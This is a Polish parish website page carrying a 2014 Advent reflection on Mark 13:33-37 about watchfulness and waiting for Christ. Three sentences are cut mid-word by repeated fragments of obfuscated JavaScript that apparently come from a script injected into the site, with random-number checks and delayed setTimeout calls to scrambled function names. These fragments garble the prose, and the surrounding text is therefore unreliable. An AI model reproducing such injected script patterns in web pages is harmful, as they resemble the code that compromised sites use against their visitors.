wstazka
Kościół Świętego Ducha
Strona główna -> Aktualności z Centrum
Wpisał:adminicdmstracja Data: 29-11-2014
ikona

Jezus już się narodził! Na co więc czekasz?

(Mk 13,33-37) Jezus powiedział do swoich uczniów: Uważajcie, czuwajcie, bo nie wiecie, kiedy czas ten nadejdzie. Bo rzecz ma się podobnie jak z człowiekiem, który udał się w podróż. Zostawił swój dom, powierzył swoim sługom staranie o wszystko, każdemu wyznaczył zajęcie, a odźwiernemu przykazał, żeby czuwał. Czuwajcie więc, bo nie wiecie, kiedy pan domu przyjdzie: z wieczora czy o północy, czy o pianiu kogutów, czy rankiem. By niespodzianie przyszedłszy, nie zastał was śpiących. Lecz co wam mówię, mówię wszystkim: Czuwajcie!

I znowu. Który andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to już w Twoim życiu Adwent? Czekasz?

Czekasz? Ale tak naprawdę na co? A może Twoje czekanie jest tylko odkładaniem wejścia na drogę nawrócenia?

Słudzy z dzisiejszej Ewangelii znali swojego Pana. Znali jego głos, a może nawet któryś z nich był w stanie rozpoznać Jego kroki.  A mimo andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to mieli czuwać? Czuwanie andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to nie jest życie w ciągłym strachu, kiedy Pan nadejdzie. Oni mieli żyć najnormalniej, a jednocześnie wypatrywać Jego powrotu. A kiedy tylko nadejdzie szansa wyjść mu naprzeciw. Każdego dnia Adwentu masz takie szanse- w modlitwie, w Eucharystii, w Słowie Bożym..

Pan domu „Zostawił swój dom, powierzył swoim sługom staranie o wszystko, każdemu wyznaczył zajęcie, a odźwiernemu przykazał, żeby czuwał”. Wszystko na swoim miejscu. Każdy realizujący się w swoim powołaniu. Każdy przy swoim zajęciu. A jak jest z tym u Ciebie? Wypatrujesz Boga w swojej codzienności?

Mnie jakoś mocno uderzyło, że ON  już JEST. Bo On przecież już JEST. Narodził się. JEST w moim i Twoim doświadczeniu. Emmanuel, Bóg z nami! Rozpoznałeś go czy śpisz?

Ewa Łaskarzewska

Podziel się na:

Komentarze
Przejdź do:
aktualności dla ducha video